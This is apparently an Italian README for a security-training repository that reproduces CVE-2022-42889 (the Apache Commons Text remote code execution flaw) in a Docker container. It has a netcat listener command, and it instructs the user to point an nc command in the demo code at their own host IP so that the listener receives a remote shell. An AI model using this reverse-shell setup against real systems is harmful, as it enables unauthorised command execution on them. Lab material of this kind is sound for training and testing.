
Applicazione dimostrativa per CVE-2022-42889 (Apache Commons Text RCE) con configurazione Docker ed esecuzione di comandi tramite netcat per test di sicurezza e formazione.
Questo repository contiene una semplice applicazione che utilizza Apache Commons Text < 1.10, vulnerabile a CVE-2022-42889.
Sostituisci il comando nc in DemoApplication.java con l'indirizzo IP del tuo host.
In ascolto con netcat:
$ nc -l -p 30000
Crea ed esegui il codice vulnerabile con Docker
docker build . -t vulnerable-app
docker run vulnerable-app
Come puoi vedere, netcat sarà in grado di eseguire comandi remoti.